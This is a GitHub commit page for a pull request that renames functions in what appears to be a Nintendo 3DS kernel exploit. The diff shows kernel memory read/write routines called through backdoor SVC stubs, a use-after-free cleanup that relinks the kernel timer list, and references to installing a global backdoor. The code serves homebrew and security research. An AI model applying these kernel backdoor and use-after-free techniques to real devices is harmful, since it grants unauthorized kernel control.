Skip to content

Commit

Permalink
Merge pull request #53 from d3m3vilurr/fix-wrong-kernel-function
Browse files Browse the repository at this point in the history 
Fix using wrong backdoor function and refactor function names
  • Loading branch information
@nedwill
nedwill authored Jan 9, 2017
2 parents 79ee164 + d8b29a1 commit 8fe7342
Show file tree
Hide file tree
Showing 6 changed files with 37 additions and 37 deletions.
14 changes: 7 additions & 7 deletions include/backdoor.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,23 +6,23 @@
bool backdoor_installed;

/* ASM SVC stubs */
Result svcMyBackdoor(s32 (*callback)(void));
Result svcDebugBackdoor(s32 (*callback)(void));
Result svcGlobalBackdoor(s32 (*callback)(void));

/* Luma backdoor */
void kmemcpy(void *dst, void *src, u32 len);
void kwriteint(u32 *addr, u32 value);
u32 kreadint(u32 *addr);
bool mybackdoor_installed();
void kmemcpy_debug(void *dst, void *src, u32 len);
void kwriteint_debug(u32 *addr, u32 value);
u32 kreadint_debug(u32 *addr);
bool debug_backdoor_installed();
void print_array_wait(char *name, u32 *addr, u32 size);
void *get_object_addr(Handle handle);
/* Used in testing exploit */
void kernel_randomstub(u32 *arg);
bool get_timer_value(Handle timer, u64 *initial, u64 *interval);

/* Real backdoor */
u32 kreadint_real(u32 *addr);
void kwriteint_real(u32 *addr, u32 value);
u32 kreadint(u32 *addr);
void kwriteint(u32 *addr, u32 value);
bool global_backdoor_installed(void);
/* Used in real exploit, must be called from kernel mode. */
void install_global_backdoor(void);
Expand Down
42 changes: 21 additions & 21 deletions source/backdoor.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -37,32 +37,32 @@ static void memcpy_int() {
memcpy(memcpy_dst, memcpy_src, memcpy_len);
}

void kmemcpy(void *dst, void *src, u32 len) {
void kmemcpy_debug(void *dst, void *src, u32 len) {
memcpy_dst = dst;
memcpy_src = src;
memcpy_len = len;
svcMyBackdoor((s32(*)(void)) & memcpy_int);
svcDebugBackdoor((s32(*)(void)) & memcpy_int);
}

void kwriteint(u32 *addr, u32 value) {
void kwriteint_debug(u32 *addr, u32 value) {
writeint_arg_addr = addr;
writeint_arg_value = value;
svcMyBackdoor((s32(*)(void)) & writeint);
svcDebugBackdoor((s32(*)(void)) & writeint);
}

static void readint() { readint_res = *readint_arg; }

u32 kreadint(u32 *addr) {
u32 kreadint_debug(u32 *addr) {
if (addr == 0) {
printf("kreadint(NULL) -> 0\n");
printf("kreadint_debug(NULL) -> 0\n");
return 0;
}
readint_arg = addr;
svcMyBackdoor((s32(*)(void)) & readint);
svcDebugBackdoor((s32(*)(void)) & readint);
return readint_res;
}

u32 kreadint_real(u32 *addr) {
u32 kreadint(u32 *addr) {
if (addr == 0) {
printf("kreadint(NULL) -> 0\n");
return 0;
Expand All @@ -72,19 +72,19 @@ u32 kreadint_real(u32 *addr) {
return readint_res;
}

void kwriteint_real(u32 *addr, u32 value) {
void kwriteint(u32 *addr, u32 value) {
writeint_arg_addr = addr;
writeint_arg_value = value;
svcGlobalBackdoor((s32(*)(void)) & writeint);
}

bool mybackdoor_installed() {
bool debug_backdoor_installed() {
/* kwriteint won't have a side effect if it's not installed.
* that svc is normally callable by userspace but returns
* an error.
*/
static u32 installed = 0;
kwriteint(&installed, 1);
kwriteint_debug(&installed, 1);
return installed;
}

Expand All @@ -105,7 +105,7 @@ bool global_backdoor_installed() {
}

void print_array_wait(char *name, u32 *addr, u32 size) {
if (!mybackdoor_installed()) {
if (!debug_backdoor_installed()) {
printf("can't print array, no backdoor\n");
return;
}
Expand All @@ -114,7 +114,7 @@ void print_array_wait(char *name, u32 *addr, u32 size) {
return;
}
for (u32 i = 0; i < size / 4; i++) {
printf("%s[%ld]: 0x%lx\n", name, i, kreadint(&addr[i]));
printf("%s[%ld]: 0x%lx\n", name, i, kreadint_debug(&addr[i]));
if (i && (i % 16 == 0)) {
printf("still going: waiting for <start>\n");
wait_for_user();
Expand All @@ -138,18 +138,18 @@ static void kernel_get_object_addr() {
}

void *get_object_addr(Handle handle) {
if (!mybackdoor_installed()) {
printf("get_object_addr: mybackdoor not installed.\n");
if (!debug_backdoor_installed()) {
printf("get_object_addr: debug_backdoor not installed.\n");
return NULL;
}
get_object_handle = handle;
svcMyBackdoor((s32(*)(void)) & kernel_get_object_addr);
svcDebugBackdoor((s32(*)(void)) & kernel_get_object_addr);
if (get_object_ret) {
u32 *obj = get_object_ret;
u32 *refcount_addr = &obj[1];
u32 refcount = kreadint(refcount_addr);
u32 refcount = kreadint_debug(refcount_addr);
if (refcount > 0) {
kwriteint(refcount_addr, refcount - 1);
kwriteint_debug(refcount_addr, refcount - 1);
} else {
printf("wtf? object is in table with 0 refcount?");
}
Expand All @@ -173,7 +173,7 @@ void kernel_randomstub(u32 *arg) {
return;
}
randomstub_arg = arg;
svcMyBackdoor((s32(*)(void)) & randomstub_wrapper);
svcDebugBackdoor((s32(*)(void)) & randomstub_wrapper);
}

static Result kernel_backdoor(s32 (*callback)(void)) { return callback(); }
Expand Down Expand Up @@ -243,11 +243,11 @@ bool get_timer_value(Handle timer, u64 *initial, u64 *interval) {
}

if (initial) {
kmemcpy(initial, &timer_addr[6], sizeof(u64));
kmemcpy_debug(initial, &timer_addr[6], sizeof(u64));
}

if (interval) {
kmemcpy(interval, &timer_addr[5], sizeof(u64));
kmemcpy_debug(interval, &timer_addr[5], sizeof(u64));
}

return true;
Expand Down
8 changes: 4 additions & 4 deletions source/backdoor_asm.s
View file
Original file line number Diff line number Diff line change
@@ -1,11 +1,11 @@
.arm
.align 4

.section .text.svcMyBackdoor, "ax", %progbits
.global svcMyBackdoor
.type svcMyBackdoor, %function
.section .text.svcDebugBackdoor, "ax", %progbits
.global svcDebugBackdoor
.type svcDebugBackdoor, %function
.align 2
svcMyBackdoor:
svcDebugBackdoor:
svc 0x2f
bx lr

Expand Down
6 changes: 3 additions & 3 deletions source/cleanup.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -65,7 +65,7 @@ static void *find_orphan() {
}

/* account for list head */
void *first_freed = (void *)kreadint_real(ktimer_pool_head);
void *first_freed = (void *)kreadint(ktimer_pool_head);
if (first_freed) {
reachable[TOBJ_ADDR_TO_IDX(ktimer_base, first_freed)] = true;
}
Expand All @@ -90,7 +90,7 @@ static void **find_parent() {
// traverse linked list until next points to userspace
void *current_node = ktimer_pool_head;
while (true) {
void *next = (void *)kreadint_real(current_node);
void *next = (void *)kreadint(current_node);

if (next == (void *)TIMER2_NEXT_KERNEL) {
return current_node;
Expand Down Expand Up @@ -122,6 +122,6 @@ bool cleanup_uaf() {

printf("Found parent and orphan: %p -> %p\n", parent, orphan);

kwriteint_real((u32 *)parent, (u32)orphan);
kwriteint((u32 *)parent, (u32)orphan);
return true;
}
2 changes: 1 addition & 1 deletion source/exploit.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ static u32 fptrs[16] = {
(u32)&install_global_backdoor,
};

/* if the UAF succeeded, setup mybackdoor */
/* if the UAF succeeded, setup global_backdoor */
static bool try_setup_global_backdoor() {
Handle timer, timer2;
Result res;
Expand Down
2 changes: 1 addition & 1 deletion source/timer.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -127,7 +127,7 @@ bool initialize_timer_state() {
return false;
}

if (mybackdoor_installed()) {
if (debug_backdoor_installed()) {
u64 initial = 0;
if (!get_timer_value(timer2, &initial, NULL)) {
printf("set_timer: get_timer_value failed\n");
Expand Down

0 comments on commit 8fe7342

Please sign in to comment.